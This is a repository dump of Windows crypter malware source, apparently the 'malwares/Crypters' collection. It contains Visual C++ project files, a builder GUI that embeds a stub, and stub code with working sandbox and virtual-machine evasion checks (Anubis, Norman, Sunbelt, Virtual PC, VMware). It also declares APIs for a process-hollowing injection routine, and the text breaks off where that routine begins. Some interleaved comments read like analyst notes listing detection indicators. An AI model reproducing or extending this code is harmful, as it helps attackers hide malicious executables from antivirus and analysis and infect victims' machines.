├── Cryptic v3.0
└── Cryptic v3.0
│ └── Cryptic v3.0
│ ├── Cryptic.dsp
│ ├── Cryptic.dsw
│ ├── Cryptic.ncb
│ ├── Cryptic.opt
│ ├── Cryptic.plg
│ ├── Cryptic.rc
│ ├── Stub
│ ├── Stub.aps
│ ├── Stub.dsp
│ ├── Stub.dsw
│ ├── Stub.ncb
│ ├── Stub.opt
│ ├── Stub.plg
│ ├── main.cpp
│ ├── resource.h
│ └── stub.rc
│ ├── XPThemes.manifest
│ ├── cryptic.bmp
│ ├── exe.ico
│ ├── main.cpp
│ ├── resource.h
│ └── skull.ico
├── DrIdle_crypter
├── MyEncrypter
│ ├── MyEncrypter.sln
│ ├── MyEncrypter.suo
│ └── MyEncrypter
│ │ ├── MyEncrypter.cpp
│ │ ├── MyEncrypter.vcxproj
│ │ ├── MyEncrypter.vcxproj.filters
│ │ ├── MyEncrypter.vcxproj.user
│ │ ├── aes256.cpp
│ │ ├── aes256.h
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── MyStub
│ ├── MyStub.sln
│ ├── MyStub.suo
│ └── MyStub
│ ├── MyStub.cpp
│ ├── MyStub.vcxproj
│ ├── MyStub.vcxproj.filters
│ ├── MyStub.vcxproj.user
│ ├── Resource.h
│ ├── aes256.cpp
│ ├── aes256.h
│ ├── resourcemanager.cpp
│ ├── resourcemanager.h
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
└── xProtect Source
├── build.cpp
├── build.h
├── main.cpp
├── readme.txt
├── stub.cpp
└── stub.h
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="Cryptic" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Application" 0x0101
6 |
7 | CFG=Cryptic - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "Cryptic.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "Cryptic.mak" CFG="Cryptic - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "Cryptic - Win32 Release" (based on "Win32 (x86) Application")
21 | !MESSAGE "Cryptic - Win32 Debug" (based on "Win32 (x86) Application")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "Cryptic - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
46 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x816 /d "NDEBUG"
50 | # ADD RSC /l 0x816 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib comctl32.lib msvcrt.lib /nologo /subsystem:windows /machine:I386 /nodefaultlib /opt:nowin98
57 | # SUBTRACT LINK32 /pdb:none
58 |
59 | !ELSEIF "$(CFG)" == "Cryptic - Win32 Debug"
60 |
61 | # PROP BASE Use_MFC 0
62 | # PROP BASE Use_Debug_Libraries 1
63 | # PROP BASE Output_Dir "Debug"
64 | # PROP BASE Intermediate_Dir "Debug"
65 | # PROP BASE Target_Dir ""
66 | # PROP Use_MFC 0
67 | # PROP Use_Debug_Libraries 1
68 | # PROP Output_Dir "Debug"
69 | # PROP Intermediate_Dir "Debug"
70 | # PROP Target_Dir ""
71 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
72 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
73 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
75 | # ADD BASE RSC /l 0x816 /d "_DEBUG"
76 | # ADD RSC /l 0x816 /d "_DEBUG"
77 | BSC32=bscmake.exe
78 | # ADD BASE BSC32 /nologo
79 | # ADD BSC32 /nologo
80 | LINK32=link.exe
81 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
82 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
83 |
84 | !ENDIF
85 |
86 | # Begin Target
87 |
88 | # Name "Cryptic - Win32 Release"
89 | # Name "Cryptic - Win32 Debug"
90 | # Begin Group "Source Files"
91 |
92 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
93 | # Begin Source File
94 |
95 | SOURCE=.\cryptic.rc
96 | # End Source File
97 | # Begin Source File
98 |
99 | SOURCE=.\main.cpp
100 | # End Source File
101 | # End Group
102 | # Begin Group "Header Files"
103 |
104 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
105 | # End Group
106 | # Begin Group "Resource Files"
107 |
108 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
109 | # Begin Source File
110 |
111 | SOURCE=.\cryptic.bmp
112 | # End Source File
113 | # Begin Source File
114 |
115 | SOURCE=.\exe.ico
116 | # End Source File
117 | # Begin Source File
118 |
119 | SOURCE=.\skull.ico
120 | # End Source File
121 | # End Group
122 | # Begin Source File
123 |
124 | SOURCE=.\Stub\Release\Stub.exe
125 | # End Source File
126 | # Begin Source File
127 |
128 | SOURCE=.\XPThemes.manifest
129 | # End Source File
130 | # End Target
131 | # End Project
132 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "Cryptic"=".\Cryptic.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.ncb
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.opt
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: Cryptic - Win32 Release--------------------
7 |
8 | Command Lines
9 |
10 |
11 |
12 | Results
13 | Cryptic.exe - 0 error(s), 0 warning(s)
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Cryptic.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // Portuguese (Portugal) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_PTG)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_PORTUGUESE, SUBLANG_PORTUGUESE
21 | #pragma code_page(1252)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 |
50 | /////////////////////////////////////////////////////////////////////////////
51 | //
52 | // Dialog
53 | //
54 |
55 | IDD_MAIN DIALOGEX 0, 0, 265, 95
56 | STYLE DS_MODALFRAME | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION |
57 | WS_SYSMENU
58 | EXSTYLE WS_EX_ACCEPTFILES
59 | CAPTION "Cryptic v3.0"
60 | FONT 8, "Tahoma"
61 | BEGIN
62 | CONTROL 102,IDC_STATIC,"Static",SS_BITMAP,0,0,265,25
63 | GROUPBOX "",IDC_STATIC,0,25,265,65
64 | LTEXT "File:",IDC_STATIC,5,35,15,8
65 | EDITTEXT IDC_FILE,25,35,180,15,ES_AUTOHSCROLL
66 | PUSHBUTTON "Browse...",IDC_BROWSE,210,35,50,15
67 | CONTROL "Create backup copy (*.bak)",IDC_BACKUP,"Button",
68 | BS_AUTOCHECKBOX | WS_TABSTOP,5,55,105,8
69 | CONTROL "Add icon",IDC_ADDICON,"Button",BS_AUTOCHECKBOX |
70 | WS_TABSTOP,115,55,40,8
71 | ICON IDI_EXE,IDC_ICONIMG,160,55,20,20
72 | PUSHBUTTON "Build",IDC_BUILD,5,70,50,15
73 | PUSHBUTTON "About",IDC_ABOUT,60,70,50,15
74 | PUSHBUTTON "Exit",IDC_EXIT,210,70,50,15
75 | END
76 |
77 |
78 | /////////////////////////////////////////////////////////////////////////////
79 | //
80 | // DESIGNINFO
81 | //
82 |
83 | #ifdef APSTUDIO_INVOKED
84 | GUIDELINES DESIGNINFO DISCARDABLE
85 | BEGIN
86 | IDD_MAIN, DIALOG
87 | BEGIN
88 | LEFTMARGIN, 7
89 | RIGHTMARGIN, 258
90 | TOPMARGIN, 7
91 | BOTTOMMARGIN, 88
92 | END
93 | END
94 | #endif // APSTUDIO_INVOKED
95 |
96 |
97 | /////////////////////////////////////////////////////////////////////////////
98 | //
99 | // Bitmap
100 | //
101 |
102 | IDB_MAIN BITMAP DISCARDABLE "cryptic.bmp"
103 |
104 | /////////////////////////////////////////////////////////////////////////////
105 | //
106 | // Icon
107 | //
108 |
109 | // Icon with lowest ID value placed first to ensure application icon
110 | // remains consistent on all systems.
111 | IDI_MAIN ICON DISCARDABLE "skull.ico"
112 | IDI_EXE ICON DISCARDABLE "exe.ico"
113 |
114 | /////////////////////////////////////////////////////////////////////////////
115 | //
116 | // 24
117 | //
118 |
119 | IDR_24 24 DISCARDABLE "XPThemes.manifest"
120 |
121 | /////////////////////////////////////////////////////////////////////////////
122 | //
123 | // STUB
124 | //
125 |
126 | IDR_STUB STUB DISCARDABLE "Stub\\Release\\Stub.exe"
127 | #endif // Portuguese (Portugal) resources
128 | /////////////////////////////////////////////////////////////////////////////
129 |
130 |
131 |
132 | #ifndef APSTUDIO_INVOKED
133 | /////////////////////////////////////////////////////////////////////////////
134 | //
135 | // Generated from the TEXTINCLUDE 3 resource.
136 | //
137 |
138 |
139 | /////////////////////////////////////////////////////////////////////////////
140 | #endif // not APSTUDIO_INVOKED
141 |
142 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.aps
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="Stub" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Application" 0x0101
6 |
7 | CFG=Stub - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "Stub.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "Stub.mak" CFG="Stub - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "Stub - Win32 Release" (based on "Win32 (x86) Application")
21 | !MESSAGE "Stub - Win32 Debug" (based on "Win32 (x86) Application")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "Stub - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
46 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x816 /d "NDEBUG"
50 | # ADD RSC /l 0x816 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib msvcrt.lib /nologo /subsystem:windows /machine:I386 /nodefaultlib /opt:nowin98
57 | # SUBTRACT LINK32 /pdb:none
58 |
59 | !ELSEIF "$(CFG)" == "Stub - Win32 Debug"
60 |
61 | # PROP BASE Use_MFC 0
62 | # PROP BASE Use_Debug_Libraries 1
63 | # PROP BASE Output_Dir "Debug"
64 | # PROP BASE Intermediate_Dir "Debug"
65 | # PROP BASE Target_Dir ""
66 | # PROP Use_MFC 0
67 | # PROP Use_Debug_Libraries 1
68 | # PROP Output_Dir "Debug"
69 | # PROP Intermediate_Dir "Debug"
70 | # PROP Target_Dir ""
71 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
72 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /YX /FD /GZ /c
73 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
75 | # ADD BASE RSC /l 0x816 /d "_DEBUG"
76 | # ADD RSC /l 0x816 /d "_DEBUG"
77 | BSC32=bscmake.exe
78 | # ADD BASE BSC32 /nologo
79 | # ADD BSC32 /nologo
80 | LINK32=link.exe
81 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
82 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /debug /machine:I386 /pdbtype:sept
83 |
84 | !ENDIF
85 |
86 | # Begin Target
87 |
88 | # Name "Stub - Win32 Release"
89 | # Name "Stub - Win32 Debug"
90 | # Begin Group "Source Files"
91 |
92 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
93 | # Begin Source File
94 |
95 | SOURCE=.\main.cpp
96 | # End Source File
97 | # Begin Source File
98 |
99 | SOURCE=.\stub.rc
100 | # End Source File
101 | # End Group
102 | # Begin Group "Header Files"
103 |
104 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
105 | # End Group
106 | # Begin Group "Resource Files"
107 |
108 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
109 | # End Group
110 | # End Target
111 | # End Project
112 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "Stub"=".\Stub.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.ncb
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.opt
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/Stub.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: Stub - Win32 Release--------------------
7 |
8 | Command Lines
9 | Creating temporary file "C:\DOCUME~1\MOJEIM~1\LOCALS~1\Temp\RSP1D.tmp" with contents
10 | [
11 | /nologo /ML /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /Fp"Release/Stub.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c
12 | "C:\Documents and Settings\moje ime\Desktop\Cryptic3source\Stub\main.cpp"
13 | ]
14 | Creating command line "cl.exe @C:\DOCUME~1\MOJEIM~1\LOCALS~1\Temp\RSP1D.tmp"
15 | Output Window
16 | Compiling...
17 | main.cpp
18 |
19 |
20 |
21 | Results
22 | main.obj - 0 error(s), 0 warning(s)
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include // comment this line if you don't want to include anti-anubis
4 |
// Function-pointer types for the Win32/NT APIs that InjectPE() looks up at run
// time with GetProcAddress() instead of calling directly. Each signature
// mirrors the API named in the corresponding GetProcAddress() call.
// Analyst note: the API names are passed to GetProcAddress() as plain string
// literals, so they remain visible in a strings dump of the stub.
5 | typedef BOOL (WINAPI *_CreateProcess)(
6 | LPCTSTR lpApplicationName,
7 | LPTSTR lpCommandLine,
8 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
9 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
10 | BOOL bInheritHandles,
11 | DWORD dwCreationFlags,
12 | LPVOID lpEnvironment,
13 | LPCTSTR lpCurrentDirectory,
14 | LPSTARTUPINFO lpStartupInfo,
15 | LPPROCESS_INFORMATION lpProcessInformation
16 | );
17 |
// Resolved from ntdll.dll in InjectPE(); used to unmap the host's original image.
18 | typedef LONG (WINAPI *_NtUnmapViewOfSection)(
19 | HANDLE ProcessHandle,
20 | PVOID BaseAddress
21 | );
22 |
23 | typedef LPVOID (WINAPI *_VirtualAllocEx)(
24 | HANDLE hProcess,
25 | LPVOID lpAddress,
26 | SIZE_T dwSize,
27 | DWORD flAllocationType,
28 | DWORD flProtect
29 | );
30 |
31 | typedef BOOL (WINAPI *_WriteProcessMemory)(
32 | HANDLE hProcess,
33 | LPVOID lpBaseAddress,
34 | LPCVOID lpBuffer,
35 | SIZE_T nSize,
36 | SIZE_T* lpNumberOfBytesWritten
37 | );
38 |
39 | typedef BOOL (WINAPI *_GetThreadContext)(
40 | HANDLE hThread,
41 | LPCONTEXT lpContext
42 | );
43 |
44 | typedef BOOL (WINAPI *_SetThreadContext)(
45 | HANDLE hThread,
46 | const CONTEXT* lpContext
47 | );
48 |
49 | typedef DWORD (WINAPI *_ResumeThread)(
50 | HANDLE hThread
51 | );
52 |
// File-scope PE header pointers (DOS header, NT headers, current section
// header); InjectPE() assigns all three while walking the payload buffer.
53 | PIMAGE_DOS_HEADER pidh;
54 | PIMAGE_NT_HEADERS pinh;
55 | PIMAGE_SECTION_HEADER pish;
56 |
// dwFileSize is shadowed by a local of the same name in WinMain(); lpFileBuffer
// is not referenced anywhere in the stub code shown in this file.
57 | DWORD dwFileSize;
58 | LPBYTE lpFileBuffer;
59 |
// IsAnubis: environment check that WinMain() labels "anti-anubis".
// Walks a Toolhelp process snapshot, records the parent PID of the current
// process and the PID of a process whose image name is exactly "explorer.exe"
// (case-sensitive strcmp; the last match wins), and returns TRUE when the two
// differ, i.e. when this process was not started by that explorer.exe.
// Analyst note: any launch that is not parented by explorer.exe (console,
// service, scheduled task, automated detonation harness) makes the stub exit
// silently, so a "no behaviour" sandbox report for this sample is not a clean
// verdict. The literal "explorer.exe" plus the Toolhelp32 APIs are usable
// static indicators.
60 | bool IsAnubis()
61 | {
62 | PROCESSENTRY32 pe32;
63 | pe32.dwSize = sizeof(PROCESSENTRY32);
64 | DWORD PID = 0, PPID = 0, expPID = 0;
// The snapshot handle is not compared against INVALID_HANDLE_VALUE before use.
65 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
66 | if(Process32First(hSnapshot, &pe32))
67 | {
// Process32Next() is called before the body runs, so the entry returned by
// Process32First() itself is never examined.
68 | while(Process32Next(hSnapshot, &pe32))
69 | {
70 | PID = pe32.th32ProcessID;
71 | if(PID == GetCurrentProcessId())
72 | {
73 | PPID = pe32.th32ParentProcessID;
74 | }
75 | if(!strcmp(pe32.szExeFile, "explorer.exe"))
76 | {
77 | expPID = pe32.th32ProcessID;
78 | }
79 | }
// The handle is closed only on this path (when Process32First() succeeded).
80 | CloseHandle(hSnapshot);
81 | }
// PPID and expPID both stay 0 if nothing matched, which compares equal (FALSE).
82 | if(PPID != expPID)
83 | {
84 | return TRUE;
85 | }
86 | else
87 | {
88 | return FALSE;
89 | }
90 | }
91 |
// IsNormanSandBox: environment check that WinMain() labels
// "anti-normansandbox". Returns TRUE when the current user name is exactly
// "CurrentUser" (case-sensitive), FALSE otherwise.
// The GetUserName() return value is not checked, so on failure the comparison
// runs against whatever the uninitialised buffer holds.
// Analyst note: the hard-coded user name is a static string indicator; an
// analysis image that uses that account name will see the stub exit early.
92 | bool IsNormanSandBox()
93 | {
94 | CHAR szUserName[MAX_PATH];
95 | DWORD dwUserNameSize = sizeof(szUserName);
96 | GetUserName(szUserName, &dwUserNameSize);
97 | if(!strcmp(szUserName, "CurrentUser"))
98 | {
99 | return TRUE;
100 | }
101 | else
102 | {
103 | return FALSE;
104 | }
105 | }
106 |
// IsSunbeltSandBox: environment check that WinMain() labels
// "anti-sunbeltsandbox". Returns TRUE when the full path of the running
// executable is exactly "C:\file.exe" (case-sensitive), FALSE otherwise.
// The GetModuleFileName() return value is not checked.
// Analyst note: the check keys on a fixed sample path, so detonating the
// sample under a different, realistic path and file name avoids this early
// exit; the path literal is also a static string indicator.
107 | bool IsSunbeltSandBox()
108 | {
109 | CHAR szFileName[MAX_PATH];
110 | GetModuleFileName(NULL, szFileName, MAX_PATH);
111 | if(!strcmp(szFileName, "C:\\file.exe"))
112 | {
113 | return TRUE;
114 | }
115 | else
116 | {
117 | return FALSE;
118 | }
119 | }
120 |
// IsVirtualPC: environment check that WinMain() labels "anti-virtualpc".
// Executes the raw byte sequence 0F 3F 07 0B inside a structured exception
// handler. If the bytes raise an exception the handler (filter value 1, i.e.
// EXCEPTION_EXECUTE_HANDLER) returns FALSE; if execution falls through, the
// function returns TRUE. The sequence is not a valid instruction on a physical
// CPU and is the widely documented Microsoft Virtual PC guest-call opcode, so
// TRUE means "running under Virtual PC".
// The remaining bytes C7 45 FC FF FF FF FF decode to
// `mov dword ptr [ebp-4], 0FFFFFFFFh`.
// NOTE(review): presumably this adjusts the compiler's SEH bookkeeping slot
// after the emitted opcode; confirm against the compiled output.
// Analyst note: the emitted byte run is a stable static signature for this
// check. 32-bit MSVC inline assembly only.
121 | bool IsVirtualPC()
122 | {
123 | __try
124 | {
125 | __asm
126 | {
127 | mov eax, 1
128 | _emit 0x0F
129 | _emit 0x3F
130 | _emit 0x07
131 | _emit 0x0B
132 | _emit 0xC7
133 | _emit 0x45
134 | _emit 0xFC
135 | _emit 0xFF
136 | _emit 0xFF
137 | _emit 0xFF
138 | _emit 0xFF
139 | }
140 | }
141 | __except(1)
142 | {
143 | return FALSE;
144 | }
145 | return TRUE;
146 | }
147 |
// IsVMware: environment check that WinMain() labels "anti-vmware".
// Issues an `in eax, dx` on port 0x5658 with EAX = 0x564D5868 ("VMXh") and
// ECX = 0x0A, then returns TRUE when EBX comes back holding 0x564D5868. This is
// the widely documented VMware backdoor I/O port query. Outside VMware the
// privileged `in` instruction faults in user mode, the handler (filter value 1,
// i.e. EXCEPTION_EXECUTE_HANDLER) runs, and the function returns FALSE.
// Analyst note: the constants 0x564D5868 and 0x5658 next to an `in`
// instruction are a well-known static signature for VM detection. A sample
// that shows no behaviour inside a VMware guest should be re-examined with
// this check in mind. 32-bit MSVC inline assembly only.
148 | bool IsVMware()
149 | {
150 | DWORD _EBX;
151 | __try
152 | {
153 | __asm
154 | {
155 | push ebx
156 | mov eax, 0x564D5868
157 | mov ebx, 0x8685D465
158 | mov ecx, 0x0A
159 | mov dx, 0x5658
160 | in eax, dx
161 | mov _EBX, ebx
162 | pop ebx
163 | }
164 | }
165 | __except(1)
166 | {
167 | return FALSE;
168 | }
169 | return _EBX == 0x564D5868;
170 | }
171 |
// InjectPE: starts szProcessName suspended and replaces its image with the PE
